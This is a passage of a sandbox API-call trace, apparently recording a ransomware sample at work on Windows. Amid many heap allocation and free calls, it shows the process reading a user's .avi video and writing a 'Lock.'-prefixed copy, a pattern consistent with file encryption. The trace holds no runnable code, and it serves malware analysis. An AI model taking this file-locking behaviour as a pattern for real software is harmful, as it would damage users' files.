hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0258.249] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.249] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0258.250] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0258.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0258.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0258.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0258.254] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.254] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.254] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.254] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa868 [0258.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0258.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.254] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/eJwCkaX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ejwckax.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0258.255] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0258.255] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0258.255] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.255] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.255] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0258.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos/Lock.eJwCkaX.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\lock.ejwckax.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0258.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0258.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0258.256] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.256] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.257] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.257] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0258.257] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x10000, lpOverlapped=0x0) returned 1 [0258.259] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x3bd9, lpOverlapped=0x0) returned 1 [0258.260] ReadFile (in: hFile=0x2cc, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0258.261] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.261] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13bd9) returned 0x24b7a48 [0258.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0258.262] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dc8 [0258.262] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0258.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0258.262] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0258.262] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2dc8 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13bd9) returned 0x24b7a48 [0258.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c28 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0258.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b13d8 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0258.263] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0258.263] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2d28 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0258.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7a8 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1788 [0258.264] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0258.264] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x13bd9) returned 0x34b2250 [0258.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0258.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.266] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1878 [0258.266] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1818 [0258.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bf0 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0258.267] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0258.267] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0258.268] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0258.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18c8 [0258.268] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3cb8 [0258.268] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0258.268] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0258.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0258.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0258.269] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0258.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0258.269] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0258.269] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0258.269] 